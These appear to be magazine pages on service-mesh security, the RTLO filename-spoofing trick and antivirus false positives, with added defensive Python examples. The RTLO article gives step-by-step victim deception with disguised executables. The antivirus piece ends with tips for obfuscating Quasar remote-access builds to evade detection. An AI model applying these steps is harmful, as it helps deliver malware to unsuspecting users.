• Because agents manage the identities (keys) automatically, their lifetime can be pretty short (e.g. 12 hours).
• There is no need to maintain keys in the enforcement plane, thereby reducing the attack surface.
• Policy agents issue the identities to the service proxies, which in turn can use these identities to communicate over TLS using mutual authentication. The application does not need any changes in this case.

Authorization can be enforced to minimize the attack surface:

• The engine contains fine grained application level policies that describe the type of requests (e.g. GET, service accounts that are allowed access) accepted at the service (workload) level. So even though the proxy has the required identity, the request can still be deemed unauthorized if it is not explicitly allowed in the policy server and enforced using enforcement agents. Depending on the capability of the proxy to understand the details of protocols, you can enforce different match criteria.
• The enforcement agent is only needed when the policy changes; otherwise, it is decoupled from the proxy.
• When the proxy gets the access request, it performs the following steps:
  1. Authenticates the request
  2. Captures the details of the access requested
  3. Matches the request against the authorization policy as dictated by the enforcement agent
  4. Allows or denies the request

Other benefits:

• The proxy can be used to collect and forward logs to a central (SIEM type) service. It can also integrate with other messaging systems[11].
• As the proxy intercepts all the traffic close to the workload, it is possible to identify accidental or intended data leaks.
• Compliance requirements of each type of workload can be defined in the policy server based on the data type, location, etc. Agents can calculate the proxy specific compliance requirements. The proxies can be used to enforce them on a request by request basis.
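As an added example, not code from the article or from any service mesh product, here is the four-step decision the proxy makes, written in Python: authenticate the peer identity presented over mutual TLS, capture the request details, match them against the workload's authorization policy, and allow or deny. The SPIFFE-style principal names, the service and path names, and the 12-hour certificate lifetime are constructed assumptions; note that a valid identity alone never grants access, the request must also match an explicit rule.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from fnmatch import fnmatchcase

# Identity handed to the proxy by the policy agent (a short-lived certificate).
@dataclass(frozen=True)
class Identity:
    principal: str        # subject of the workload cert, SPIFFE-style ID (constructed)
    not_after: datetime   # certificate expiry; agents rotate these automatically

# One fine-grained rule of the workload-level authorization policy.
@dataclass(frozen=True)
class Rule:
    principals: tuple     # peer identities allowed to call this workload
    methods: tuple        # request types accepted, e.g. ("GET",)
    paths: tuple          # glob patterns, e.g. ("/accounts/*",)

@dataclass(frozen=True)
class Policy:
    workload: str         # the service this policy protects
    rules: tuple          # explicit allow list; anything unmatched is denied

def authenticate(identity, now):
    """Step 1: the peer must present a valid, unexpired workload identity."""
    if identity is None:
        return "unauthenticated: no client certificate presented"
    if identity.not_after <= now:
        return f"identity expired for {identity.principal}"
    return None

def capture(method, path):
    """Step 2: record the details of the access being requested."""
    return {"method": method.upper(), "path": path}

def match(policy, identity, request):
    """Step 3: find an explicit rule covering principal, method and path."""
    for rule in policy.rules:
        if (identity.principal in rule.principals
                and request["method"] in rule.methods
                and any(fnmatchcase(request["path"], p) for p in rule.paths)):
            return rule
    return None

def authorize(policy, identity, method, path, now=None):
    """Step 4: allow or deny. Returns (decision, reason) for the proxy's log."""
    now = now or datetime.now(timezone.utc)
    problem = authenticate(identity, now)
    if problem:
        return ("DENY", problem)
    request = capture(method, path)
    if match(policy, identity, request) is None:
        # A valid identity is not enough: the access must be explicitly allowed.
        return ("DENY", f"{identity.principal} not allowed "
                        f"{request['method']} {request['path']} on {policy.workload}")
    return ("ALLOW", f"matched rule for {identity.principal}")

# Constructed sample: the storage service only accepts reads from the aggregator.
STORAGE_POLICY = Policy(
    workload="accounts-storage",
    rules=(Rule(principals=("spiffe://bank.example/ns/prod/sa/aggregator",),
                methods=("GET",),
                paths=("/accounts/*",)),),
)

NOW = datetime(2019, 7, 1, 9, 0, tzinfo=timezone.utc)
AGGREGATOR = Identity("spiffe://bank.example/ns/prod/sa/aggregator",
                      NOW + timedelta(hours=12))
UI_FRONTEND = Identity("spiffe://bank.example/ns/prod/sa/ui-frontend",
                       NOW + timedelta(hours=12))
STALE_AGGREGATOR = Identity(AGGREGATOR.principal, NOW - timedelta(minutes=1))

if __name__ == "__main__":
    for ident, method, path in [(AGGREGATOR, "GET", "/accounts/42"),
                                (AGGREGATOR, "DELETE", "/accounts/42"),
                                (UI_FRONTEND, "GET", "/accounts/42"),
                                (STALE_AGGREGATOR, "GET", "/accounts/42"),
                                (None, "GET", "/accounts/42")]:
        print(authorize(STORAGE_POLICY, ident, method, path, NOW))
```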
Beyond infrastructure - Further reducing the attack surface

The above approach will reduce the attack surface exposed due to infrastructure elements. However, the APIs themselves may provide a viable breach target (though the impact might be localized and limited). Below are some strategies to mitigate the attack surface exposed by APIs[12].

1. Making security an integral part of the continuous delivery pipeline: At a high level, the flow along with its security components looks like the figure below. Note that this is just a representation; check the footnotes for more definitive sources in this area[13].

Fig 5. Security in CI/CD pipeline

2. Focusing on compliance as a product: The DevOps Audit Defense Toolkit[14] summarizes the techniques that can be used to demonstrate to auditors that the company understands the business risks and is properly mitigating those risks. The compliance requirements are automated in the CI/CD pipeline tools. Change management is also automated, and every change in the code is tied back to an approved ticket. This enforces traceability and auditability.

3. Security of infrastructure code: The practices mentioned in the DevOps Audit Defense Toolkit are applicable in this area as well. Configuration management and automation tools like Ansible, Chef, and Puppet can be used to support automated testing. Peer reviews are conducted before commits. All changes are logged and analyzed.

Leveraging provable security methods

Provable security[15] (or model based validation) in our context means using formal methods to test and demonstrate the security of the design. We start with threat modeling (albeit not considering side channel attacks) and determine the coverage provided by the controls as the attack manifests. The above mentioned design is based on two high level sets of policies:

• Identification / authentication / access control lists, and
• Authorization

The objective here would be to develop an automated system that validates the security of the design by comparing it against defined benchmarks (a set of fundamental rules that we have defined for the particular environment). For example, a benchmark can be that production systems should only be accessible via a jump host, or that the user ids that have access to the systems change based on the time of the day (such as an on-call roster). As in traditional design, we can leverage threat modeling[16] to determine the potential vulnerabilities (and hopefully the associated attack trees). Once we understand these vulnerabilities, we can determine the corresponding rules that can be enforced using the policies described on the Policy Server. These policies describe the expected state (benchmark policies) of the environment that should be enforced by agents through proxies. During day to day operations, the system admins, application owners, and others will define new policies. Before the new policies can be implemented, they can be compared automatically (as part of the CI/CD pipeline) with the pre-defined benchmarks. So the flow might look like:

Fig 6. Embedding provable security in CI/CD flow

The advantage of this process is that it is completely transparent to the developers or infrastructure engineers. When a change to the existing environment is pushed (for example, a new app version that requires modifications to the existing access or authorization policies), the change is automatically routed to the analysis engine. The engine then compares it against the benchmarks and highlights the policy areas that violate the required security thresholds. As the analysis is done at the policy element level, the output/remediation also contains the exact elements that need to be modified to meet the required criteria. In addition, the CI/CD pipeline can be configured to check the policy changes against the baseline before filing a change ticket.

References:

[1] https://doi.ieeecomputersociety.org/10.1109/MS.2018.2141039
[2] https://en.wikipedia.org/wiki/Application_programming_interface
[3] https://en.wikipedia.org/wiki/Docker_(software)
[4] https://github.com/kubernetes/kubernetes
[5] https://docs.docker.com/engine/swarm/
[6] https://www.owasp.org/index.php/OWASP_API_Security_Project
[7] https://dl.acm.org/citation.cfm?id=3274720
[8] https://github.com/devsecops/devsecops
[9] https://ai.google/research/pubs/pub43231
[10] https://www.nginx.com/blog/what-is-a-service-mesh/
[11] https://kafka.apache.org/
[12] https://www.owasp.org/index.php/OWASP_API_Security_Project
[13] https://www.devsecops.org/, https://www.devsecopsdays.com/
[14] https://itrevolution.com/devops-audit-defense-toolkit/
[15] https://en.wikipedia.org/wiki/Provable_security
[16] https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html
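As an added illustration, not part of the article or of any product, the following Python sketches the analysis engine of Fig 6: a proposed set of access policies is checked element by element against the two benchmarks the text names (production systems reachable only via a jump host, and user access to production tied to the on-call roster), and every violation names the exact policy element to fix, so the change can be blocked before a change ticket is filed. The policy schema, the service names and the roster are constructed assumptions.

```python
from dataclasses import dataclass

# Constructed policy schema: one entry per access grant proposed in a change.
# "via" is the path the access takes; "window" is the (start_hour, end_hour)
# in UTC during which the listed principals may use the grant.
PROPOSED_CHANGE = [
    {"id": "accounts-db-admin", "env": "prod", "target": "accounts-db",
     "principals": ["user:alice"], "via": "jumphost", "window": (9, 17)},
    {"id": "ledger-debug", "env": "prod", "target": "ledger",
     "principals": ["user:bob"], "via": "direct", "window": (0, 24)},
    {"id": "ui-dev-access", "env": "dev", "target": "ui-frontend",
     "principals": ["user:carol"], "via": "direct", "window": (0, 24)},
]

# Constructed on-call roster: principal -> (start_hour, end_hour) in UTC.
ON_CALL_ROSTER = {"user:alice": (8, 18), "user:bob": (18, 24)}

@dataclass(frozen=True)
class Violation:
    policy_id: str
    element: str      # exact element to change, e.g. "via" or "principals[0]"
    benchmark: str
    message: str

def benchmark_jump_host(policy):
    """Benchmark 1: production systems are only accessible via a jump host."""
    if policy["env"] == "prod" and policy["via"] != "jumphost":
        yield Violation(policy["id"], "via", "prod-via-jumphost",
                        f"'{policy['via']}' must be 'jumphost' for {policy['target']}")

def benchmark_on_call(policy, roster):
    """Benchmark 2: user ids may reach production only during their on-call slot."""
    if policy["env"] != "prod":
        return
    start, end = policy["window"]
    for i, principal in enumerate(policy["principals"]):
        if not principal.startswith("user:"):
            continue                      # service accounts are covered elsewhere
        slot = roster.get(principal)
        if slot is None:
            yield Violation(policy["id"], f"principals[{i}]", "prod-on-call-only",
                            f"{principal} is not on the on-call roster")
        elif start < slot[0] or end > slot[1]:
            yield Violation(policy["id"], "window", "prod-on-call-only",
                            f"{principal} window {start}-{end} exceeds "
                            f"on-call slot {slot[0]}-{slot[1]}")

def analyse(change, roster=ON_CALL_ROSTER):
    """The analysis engine: every benchmark violation in the proposed change.
    An empty list means the change may proceed to the change ticket."""
    violations = []
    for policy in change:
        violations.extend(benchmark_jump_host(policy))
        violations.extend(benchmark_on_call(policy, roster))
    return violations

if __name__ == "__main__":
    for v in analyse(PROPOSED_CHANGE):
        print(f"{v.policy_id}.{v.element} [{v.benchmark}]: {v.message}")
```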
Right to Left Override (RTLO) Technique

What is RTLO?

RTLO stands for Right-to-Left Override. It is a Unicode control character, U+202E, mainly used for writing and reading Arabic or Hebrew text: it tells computers to display the text that follows it in right-to-left order, that is, it reverses the order of the characters that follow it. RTLO has been used in phishing attacks for many years, where attackers insert the RTLO character in the filenames of attachments and try to trick users into thinking the attachment is safe. For example, a file named "malwaregpj.exe" will appear as "malwareexe.jpg", which is an executable file with a U+202E placed just before "exe."

Pal Patel
Pal Patel is a Security Researcher, Penetration Tester, and Bug Bounty Hunter with over 3 years of experience. Pal has been awarded by more than 250 companies for finding the loopholes in their systems.

The RTLO character can be found in the Character Map:

How do you trick a victim using the RTLO technique?

This trick is normally used in chat functionality when you are chatting with a victim. For example: "Hey check out my new song at example.com/song[rtlo]3pm.exe."

Replace the [rtlo] placeholder in the URL with the RTLO symbol from the Character Map and send the URL to the victim. When the victim receives the URL, it looks like: "Hey check out my new song at example.com/songexe.mp3."

When the victim sees mp3, he/she at least thinks it is a song, so he/she clicks on the link. As soon as they click on the link, the RTLO gets triggered and it shows:

http://example.com/song%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE%E2%80%AE3pm.exe

It can trick the victim in the same way, and different social engineering techniques are also used to trick the victim using RTLO. Twitter, Skype, Snapchat, etc., have protection against the RTLO technique in their chat functionality. This technique is a bit old, but it is still being used for placing malware, backdoors, etc.

Let's take another example:

• There is a malicious file named doc.exe
• Copy the RTLO character from the Character Map
• Enter the extension that you want in reverse; for example, if we want "doc", we need to write "cod", or if we want "pdf", then we need to write "fdp"
• The real name of the file is: "doc[RTLO]fdp.exe"
• Paste the RTLO symbol
• Afterwards the file would appear as docexe.pdf. A victim can be tricked using the file extension
• A good idea would be to change the icon of the malicious file and also use a name that can trick the user, like a malicious file disguised as a Microsoft Word file, with a tricky name in order to preserve the original extension and fool the user

Conclusion

Hackers use every trick in the book to disguise their malicious files. Read more about phishing techniques and ways to protect yourself. These tricks are very easy to implement and effective. We should be vigilant for every URL or file that we download or open. As they say, the devil lies in the details. BE SAFE, BE SECURE!!

References:

https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
https://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/
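As an added example on the defensive side, not code from the article, the following Python checks a filename or a URL's last path segment for U+202E and related bidi controls, shows the name as a user would see it next to the extension the operating system actually uses, and flags the mismatch; this is the check a mail gateway or chat filter would run on attachments and links. The sample names are constructed from the cases described above, and the rendering simulation is a simplification (everything after the first override is shown reversed).

```python
import unicodedata
from urllib.parse import unquote, urlsplit

RLO = "\u202e"
# Bidi control characters that can reorder or hide text in a displayed name.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069", "\u200e", "\u200f"}

def displayed(name):
    """Approximate what a bidi-aware renderer shows: everything after the
    first RLO is drawn right to left, i.e. it appears reversed on screen."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    tail = "".join(c for c in tail if c not in BIDI_CONTROLS)
    return head + tail[::-1]

def real_extension(name):
    """The extension the OS actually uses: control characters do not count."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[1].lower() if "." in clean else ""

def inspect_name(name):
    """Report on one filename: what is shown versus what is really there."""
    shown = displayed(name)
    controls = set(name) & BIDI_CONTROLS
    return {
        "has_rtlo": RLO in name,
        "bidi_controls": sorted(unicodedata.name(c, hex(ord(c))) for c in controls),
        "displayed": shown,
        "displayed_extension": shown.rsplit(".", 1)[1].lower() if "." in shown else "",
        "real_extension": real_extension(name),
    }

def is_suspicious(report):
    """Flag any override character, or any displayed/real extension mismatch."""
    return report["has_rtlo"] or report["displayed_extension"] != report["real_extension"]

def inspect_url(url):
    """Percent-decode the last path segment (%E2%80%AE is U+202E) and inspect it."""
    last_segment = urlsplit(url).path.rsplit("/", 1)[-1]
    return inspect_name(unquote(last_segment))

if __name__ == "__main__":
    # Constructed samples: the two tricks from the article plus a clean file.
    for sample in ("doc\u202efdp.exe", "report.pdf"):
        r = inspect_name(sample)
        print(f"{r['displayed']!r}: real .{r['real_extension']}, suspicious={is_suspicious(r)}")
    r = inspect_url("http://example.com/song%E2%80%AE3pm.exe")
    print(f"{r['displayed']!r}: real .{r['real_extension']}, suspicious={is_suspicious(r)}")
```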
  • 36. Antivirus Evasion Basics Basic information In this article, we are going to talk about how to evade antivirus protection and how it can be hard for developers who create legitimate software and techniques on antivirus evasion. I strongly recommend that you use this information for white-hat purposes only, otherwise, you can get in trouble. We will talk about all types of things that can help a developer avoid false positives in development of their software. Everybody who is facing this problem should know all the basic things and tools that can help handle this type of problem. 35 Many antiviruses are designed to function analogous to the immune system of a human being. They operate by scanning the computers for available signatures corresponding to the binary pathogens and infections. The antivirus refers to a dictionary of the known viruses, and if any detail obtained within the file resembles the pattern in the dictionary, then the antivirus neutralizes it. Analogous to the human immune system, the content of the dictionary requires updates like the flu shots to provide considerate protection against emerging strains of viruses. Any antivirus counteracts to what it deems as harmful. The problem arises concerning the creation of new strains of viruses at a rapid rate at which the antivirus developers may not keep pace. Ethical hacker with 12 years of experience. Worked in CQR company in Ukraine. Geek,  IT security addict. His nickname is VULNZ. Bohdan Ethics Antivirus Evasion Basics
  • 37. False positive EXE.cuted. False positive problems on legitimate software This research is made for developers who face false positive results on their software. Signature detection Many antiviruses are designed to function analogous to the immune system of a human being. They operate by scanning the computers for available signatures corresponding to the binary pathogens and infections. The antivirus refers to a dictionary of the known viruses, and if any detail obtained within the file resembles the pattern in the dictionary, then the antivirus neutralizes it. Analogous to the human immune system, the content of the dictionary requires updates like the flu shots to provide considerate protection against emerging strains of viruses. Any antivirus counteracts to what it deems as harmful. The problem arises concerning the creation of new strains of viruses at a rapid rate at which the antivirus developers may not keep pace. Thus, the computer becomes vulnerable during the period between the time of detection of the virus and the time the dictionary update is released from antivirus dealers, the reason behind keeping the antivirus updated as much as possible. Scan engines Method Most importantly, the antivirus’s core function is virus scan engine. The antivirus scans the information, and when the virus is detected, the antivirus disinfects it. Mentioned below are different ways of virus scanning. 36 Antivirus Evasion Basics
  • 38. Main Basic Techniques Size: the antivirus easily detects if the file is changed or infected. It is common for some viruses to append their malicious codes at the terminal of the file. An antivirus, in this case, scans the file and then compares the before and after sizes. When the computer user makes no changes, the antivirus suspects the presence of malicious actions running on the computer. Pattern matching: there is a distinct and unique signature corresponding to each virus. The signature is used by the virus to infect files of computers and could be a few lines in an assembly language that overwrites the stack pointer rather than jumping to the new line of code. The antivirus compares information with the virus’ unique signature and presence of resemblance is a clear indication of an infection. A heuristic process occurs when the information being scanned is dangerous without the user knowing whether it contains a virus or not. The technique involves an analysis of the data and then comparing it the list of hazardous actions. For instance, if the antivirus detects that software is attempting to open each EXE file and infecting it by writing a replica of the original program into it, the antivirus recognizes the program and declares it is a dangerous activity and thus sounds an alarm. Now the decision remains to the user whether to eliminate the perilous virus or not. The above methods have merits and demerits. If the antivirus utilizes the signature approach, it needs to update it regularly. This should be done on a daily basis since at least 15 new viruses emerge every single day. Thus, if the antivirus is left un-updated for many days, it may cause severe danger. Other ways the antivirus works includes monitoring of incoming files and deleting any virus within the files, placing suspect files in quarantine and updating the software produced by the developers to address emerging infections. 
In this case, the software may be set such that it checks for updates at regular time intervals. False positives False positive is the process of false and positive identification of a computer virus. In false identification, the antivirus identifies a good program as a virus. False positive is regarded as a demerit of virus identification method. Small weaknesses of any virus identification method may result in false positives that are fatal as false negatives. For an ideal situation, the false positive rate tends to be zero or approximately close to zero. Any small rise in the false positive rate is not desired. 37 Antivirus Evasion Basics
  • 39. Note: This is a good example of what percent of false positives occur. These are outdated statistics, but the idea is clearly seen. • Reasons for getting False Positives There are particular procedures that give very sensitive scanning by determining the relationship between the viruses and their signatures. This type of method has a drawback whereby it is impossible to detect new and unknown viruses. However, generic methods can identify all kinds of viruses without necessarily using virus signatures. The generic methods also have their drawbacks since they create false positives. For instance, the heuristic can detect new and unknown viruses though they are prone to false positives. This is because the method adopted by heuristics relies on probabilistic methods and is therefore not certain of an infection. For example, if a heuristic program identifies a file “open” prompt, followed by “file read” and “write” prompts, and also identifies a string “Virus” within the program, then it can respond that the file is under attack from the unidentified virus. There are chances that a file infected by a virus may meet all the conditions that render it infected; this is what results in false positives. As mentioned, generic methods are the most susceptible to false positives. 38 Antivirus Evasion Basics
False positives may result from the difficulty of distinguishing good code from bad code. Making a wrong decision results in either a false positive or a false negative. The antivirus looks solely for the signatures of viruses, not for the whole virus program, and it also looks for wildcard signatures. The signatures that the antivirus finds are not necessarily found only in virus code. Since the conventional signature is redundant when handling polymorphic and metamorphic malware, antiviruses with new technologies should incorporate heuristic approaches to deal with such viruses. Such methods are often faced with high rates of false positives.

• Solutions

1. All software should have the same basic information as a binary file: Description, Version, Product name, Language, Company name. Many false positives occur because the file does not have any such information inside, so it is flagged as suspicious or unwanted.

2. We need to check whether the file was flagged as a virus based on its md5; it is a very uncommon situation, but it can accidentally happen. Here is an example of how it can happen.

3. We need to pack the exe in order to make it harder to unpack. In this case we could use a custom packer, but on the other hand it is better to pack it using standard UPX, because creating a custom packer can cause new problems for antiviruses that will not be able to identify which type of packer was used. Antivirus programs trust commonly used packers and do not like custom packers or some kinds of antivirus packers.

4. We have to avoid using hooks that write to or read from the registry if we don't need them. Here is a list of suspicious registry calls that should be avoided: calls concerning antivirus software, firewall, remote administration, keyboard layout, extension change, update enable/disable, and looking at or editing the system journal.

5. We have to avoid using system files and services that work with remote administration or connections if we do not develop network software. Calling integrated software like ftp, telnet, psexec, rdp or others from inside our binary can cause a false positive, because a lot of malicious software uses the integrated ftp client, for example, to steal and transfer data over the internet. It is better to use system tools, not system software.
6. It is a good idea to create an MSI package for installing and uninstalling software. Here is an example of how to create MSI packages. It was also checked that antivirus programs trust MSI files more, because they are mostly used for good purposes, and they pass behavioral analysis better.

Example of a terminal utility to pack an exe with UPX.

7. We can give the ability to check right away, using the VirusTotal database, whether the compiled binary is flagged as malware, and give advice.

8. If the developer wants to avoid reverse engineering of his code, anti-VirtualBox/sandbox solutions with virtual environment detection can be enabled.

9. Prevent the community from creating malicious software. Talk to the community and do weekly research on GitHub and other websites to see whether someone has created malicious software. Such creations make antivirus companies look deeper and may produce more false positives. This happened with the Develstudio project. Develstudio is a project created to build a GUI or binary from PHP code. Based on research, this project almost closed and lost a large number of followers because it was used for malware creation, not for clean php2exe projects. The algorithm can be as simple as this: find all similar projects on GitHub, download them to the cloud and check all releases (binaries) for viruses. To make it more complex: compile and check. This is not hard if the community is not big. Here can be found wrappers for common viruses, which makes it easier to work with them rather than only checking them on VirusTotal.

10. Better not to use common names of Windows core files, as it was found that some antiviruses react to common names like "svhost.exe", "system32.exe", etc.

11. Better not to use the names of commonly used software like "firefox.exe", "chrome.exe", etc. It was proven that 3-5% of antiviruses react to this type of name by rechecking the md5 of the real products and their versions against this binary.

12. One of the most important procedures in software development is approval, and it was checked that every binary that is not signed, or not flagged on the antivirus server as commonly used, will be blocked by the browser or Windows SmartScreen. Here is an automated solution with a bat file that can be used to sign software. Here is a commercial utility and a project where you can buy a certificate and software to sign builds.

13. Do not put multiple exe files inside one. This type of activity is common for a Trojan horse, so it is important to understand that archiving one binary inside another, for whatever reason, can cause problems.

Note: This is an example of an exe joiner that was marked as malicious without actually being so, only because it is commonly used to glue together malicious software, so its algorithm is marked as malicious, too.

14. It was found that some binaries contain a large number of consecutive ZEROs. For antiviruses this can be understood as problematic software, because it creates a deliberately unused area in memory or on the hard drive in order to bypass md5 checks, some behavioral analysis, or signature-based analysis, so it is important to produce code where no long lines of zeros can be found in a hex editor.

15. It is a great idea to allow users to read the terms and conditions before they install or run the software. There is no confirmed information about antiviruses checking for the existence of terms and conditions.
16. Custom icons for binary files are one reason a file may not be detected as malicious. As was explained earlier, there are machine learning techniques that give information about "WHAT malware should look like", and most malware by itself does not have an icon, because its developer either steals icons, which is detected by antivirus as well, or does not create one, leaving the standard one.

17. Do not use special characters or a large number of white spaces or dots in the name. It was checked many times with different antiviruses that, as a defense against extension spoofing, names that violate certain rules will be blocked and marked as malicious. It is easy to check by creating a clean exe with a spoofed name. Here is the software.

18. Files that download other files or source code from the internet and run them. This looks like a problem to some antiviruses, since they cannot control all processes, so if they see such a mark, the action appears suspicious.

19. Files that download and run libraries can be flagged as dangerous because, based on machine learning, some .dll files can be used in the mass development of malicious software, and you can be the one accidentally using one. It is always better to use OS-integrated software.

20. Try not to inject into a running process because, as was mentioned before, many antivirus solutions can see hooks or injectors and mark them as suspicious even if they do no harm.

Signature creation process: Here is a good article where everything can be found about creating signatures for viruses for ClamAV. This article was read and, based on it, we put some additional information above.

Solving the problem: Software can be developed that detects whether a binary was compiled by a compiler and helps it to bypass all the problems step by step, or it can be integrated inside the compiler (not sure it is a good idea, given the size increase). All the steps can be found above. The idea is to make it easier for developers who want to distribute their software but constantly face problems with false positives. This can be a different product, but it can also be packaged as "tools" that help the developer with this issue.
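An added example (not the article's, nor any vendor's, tool) of the kind of pre-release check the paragraph above asks for: a linter that inspects a binary and its file name for the false-positive triggers listed in items 1, 3, 10, 11, 13, 14 and 17 (missing version info, UPX marker, lookalike core and popular names, an executable embedded in another, long runs of zero bytes, spoofed names). Header parsing is a minimal struct walk rather than a full PE parser, the zero-run threshold and the extra names in the lists are assumptions, and the sample files are constructed.

```python
"""Added example, not the article's tool: a pre-release linter that checks a
binary and its file name for the false-positive triggers listed above.
Header parsing is a minimal struct walk, not a full PE parser."""
import re
import struct

ZERO_RUN_THRESHOLD = 4096   # assumption: consecutive 0x00 bytes worth flagging (item 14)
CORE_NAMES = {"svhost.exe", "system32.exe", "svchost.exe", "csrss.exe", "lsass.exe"}  # item 10
POPULAR_NAMES = {"firefox.exe", "chrome.exe", "winword.exe"}                            # item 11
DOC_EXTENSIONS = r"pdf|docx?|xlsx?|jpe?g|png|txt"                                        # item 17

def count_pe_headers(data: bytes) -> int:
    """Count 'MZ' stubs whose e_lfanew (offset 0x3C) points at a PE signature (item 13)."""
    count, pos = 0, data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            if data[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                count += 1
        pos = data.find(b"MZ", pos + 1)
    return count

def longest_zero_run(data: bytes) -> int:
    return max((len(m.group()) for m in re.finditer(rb"\x00+", data)), default=0)

def name_findings(name: str) -> list:
    low = name.lower().strip()
    findings = []
    if low in CORE_NAMES:
        findings.append("lookalike-core-name")
    if low in POPULAR_NAMES:
        findings.append("lookalike-popular-name")
    if re.search(r" {2,}|\.{2,}", name):
        findings.append("name-has-repeated-spaces-or-dots")
    if re.search(rf"\.({DOC_EXTENSIONS})\s*\.exe$", name, re.I):
        findings.append("name-double-extension")
    if any(ord(c) > 126 for c in name) or re.search(r'[<>:"|?*]', name):
        findings.append("name-special-characters")   # non-ASCII covers RTL-override tricks
    return findings

def lint_binary(name: str, data: bytes) -> list:
    """Return a list of finding codes; an empty list means no trigger was found."""
    findings = name_findings(name)
    if "VS_VERSION_INFO".encode("utf-16-le") not in data:   # item 1: no version resource
        findings.append("no-version-info")
    headers = count_pe_headers(data)
    if headers > 1:
        findings.append(f"embedded-executable:{headers}")
    run = longest_zero_run(data)
    if run >= ZERO_RUN_THRESHOLD:
        findings.append(f"zero-run:{run}")
    if b"UPX0" in data or b"UPX!" in data:                    # item 3: recognised packer
        findings.append("packer:upx")
    return findings

def build_pe_like(body: bytes) -> bytes:
    """Constructed stand-in for a PE image (DOS stub, e_lfanew=0x40, PE signature); not loadable."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = struct.pack("<I", 0x40)
    return bytes(hdr) + b"PE\0\0" + body

# Constructed samples, not real binaries.
RISKY_NAME = "invoice.pdf          .exe"
RISKY_DATA = build_pe_like(b"\0" * 8192 + build_pe_like(b"second stage"))
CLEAN_NAME = "backup-tool.exe"
CLEAN_DATA = build_pe_like(b".text\0\0\0" + "VS_VERSION_INFO".encode("utf-16-le")
                           + b"Backup Tool 1.2 Example Co.")

if __name__ == "__main__":
    for name, data in ((RISKY_NAME, RISKY_DATA), (CLEAN_NAME, CLEAN_DATA)):
        print(repr(name), lint_binary(name, data) or "clean")
```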
Note: Example of what an exe maker/wrapper that helps to bypass false positives can look like.

To summarize all the information given before, here is what antivirus engineers answer when asked why false positives occur. Some comments on why false positives happen on their antivirus solutions:

Ryan Permeh, Cylance: "The Cylance engine is not an antivirus engine. Unlike AV, it doesn't have a bias toward letting everything run. The technology doesn't assume a file is good until it's evaluated. Our approach is to measure and decide on each and every file individually, and if it doesn't fit into our model of good, it leans towards bad. Without a bunch of data to base a decision on, and without any real patterns of goodness to identify it as such, the engine leaned heavily on the structural bits that are odd and drew a line towards bad in this case. When we train models, we train on hundreds of millions of good and hundreds of millions of bad files (samples). We look at several million potential data points (features) in each file. In general, a piece of code can become "bad" by doing things that lean towards bad. But it can also lean towards bad by not doing things that lean towards good. So in the most basic example provided (hello world in debug build): the sample was small. It didn't show any bad, but it didn't show any good either; one-function programs are almost always malware; debug builds are statistically weird; using mingw rather than Visual Studio is statistically weird. The output binary is 'odd.'"

Hyrum Anderson, Endgame: "Before Twitter caught ablaze with these "hello world" samples, our own internal research indicated that our and other models were susceptible to these toy samples. Let's explain why. Endgame's machine learning malware detection uses static features to determine, before a customer executes a file, whether it is likely malicious or benign. The machine learning model is an imperfect summarization of tens of millions of malicious and benign software on which the model was trained. As an imperfect model, it can obviously be wrong, but is still extremely useful in detecting never before seen malware, far more useful than approaches which rely on signatures for already known malware families. For the case of our model and other machine learning models based on static features, the model can be wrong in this case because, in the training dataset, the model has seen: lots of real malware samples that are small unsigned binaries; lots of real malware samples where the entry point (.text) section is small, like droppers' unpacking stubs; lots of real malware samples that attempt to hide their imports from static analysis by some method, so that their import table looks very small. On the contrary, there are very few "useful" benign files that are small, certainly too few to contradict the above experience. It's important to note that machine learning is actually quite good for prevention and detection of malware, both novel samples and the more well known. Endgame was one of the only few to get NotPetya in VirusTotal, for example. That said, all machine learning models have blind spots (false negatives) and they can mistakenly call things bad (false positives). In fact, we've shown in our published research that for some machine learning models, these vulnerabilities can be quite convenient to exploit... At Endgame, we employ a strategy of layered protections that align with a large number of commonly seen attacker actions. Our MalwareScore engine (released standalone in VirusTotal) represents only a single slice of that layered protection paradigm. The layers work in concert to alert our customers of potential threats (reducing FNs), and work together to build a complete story of a potential threat (reducing FPs). Fortunately, the samples highlighted on Twitter are interesting corner cases, but are extremely esoteric for our customer base. Nevertheless, we continually are doing more research to improve our detection ratio and reduce our false positive rate. This involves data gathering to increase our model's understanding of the universe of benign and malicious software as well as a huge amount of experimentation effort to maximize our model's performance. We put a great amount of attention on addressing known false positives seen by our customers. As a result of these efforts, we regularly release models to our customers and to VirusTotal. And we continue to work with 3rd parties to validate our model's performance on real files."

Dr. Sven Krasser, CrowdStrike: "There are two important aspects to understand. First, the machine learning models for static file analysis we use at CrowdStrike are optimized to detect malware, especially novel families that bypass signature-based approaches, while avoiding interference with legitimate business applications. However, unusual and artificially constructed files fitting into neither of these two categories are occasionally detected as well. For this reason, we expose confidence values and allow customers to set their own thresholds. While in this instance our file analysis engine was arguably too aggressive, generally this behavior is by design: if a file does not look like a legitimately useful application while also exposing unusual traits, then the sound call is to prevent it from executing. Avoiding odd looking yet potentially benign objects should be a familiar concept should you have ever opened an office fridge before. Second, static file analysis alone (i.e. what most vendors provide on VirusTotal) is simply not a sufficient security tool on its own. It is easy to create files that behave benignly yet are detected by both signature and ML-based engines. It is, however, also possible to create malware files that bypass detection. That is trivially possible for signature-based engines, but one can also bypass ML-based static file analysis with some effort. Therefore, CrowdStrike Falcon uses static file analysis as only one of many techniques to detect threats while combining it with several other layers of defense, such as advanced Indicators of Attack."

Compilation from source

For the example of Quasar, you can take Visual Studio 2017 and build it from source. Beforehand, you can add to the code itself:
1) Commands or variables that do not affect the process
2) Additional functions that do something
3) Delay the execution of something
4) Change the names of variables in the entire project
5) Obfuscate the code
